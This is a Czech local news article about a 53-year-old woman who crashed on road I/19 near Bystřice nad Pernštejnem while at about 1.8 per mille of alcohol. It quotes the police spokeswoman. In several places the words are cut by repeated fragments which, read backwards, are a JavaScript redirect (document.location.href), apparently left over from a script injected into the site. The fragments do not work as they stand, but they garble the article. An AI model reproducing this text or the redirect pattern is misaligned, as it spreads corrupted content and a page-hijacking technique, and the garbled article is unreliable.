Rainbow page separator

Třiapadesátiletá žena havarovala, nadýchala skoro dvě promile

Úterý, 10. srpna 2021

Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny

Bystřice nad Pernštejnem / Hmotnou škodou a zraněním třiapadesátileté řidičky skončila dopravní nehoda, k níž došlo v úterý 3. srpna před desá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou večerní na silnici I/19 mezi Bystřicí nad Pernštejnem a osadou Rovné.
„Při průjezdu táhlou zatáčkou řidička vozidla značky Hyundai nezvládla řízení a vyjela mimo komunikaci do silničního příkopu. Žena se při nehodě zranila a na ošetření byla zdravotnickou záchrannou službou převezena do nemocnice v Novém Městě. Policisté u řidičky provedli dechovou zkoušku, při které jí naměřili hodnotu 1,82 promile alkoholu. Opakované zkoušky ukázaly hodnoty ještě vyšší,“ informovala policejní mluvčí Jana Kroutilová.
Mís[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nehody policisté ohledali a zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali, kolizi dále prověřují. „Ženě policisté zadrželi řidičský průkaz a je podezřelá ze spáchání trestného činu ohrožení pod vlivem návykové látky,“ dodala mluvčí.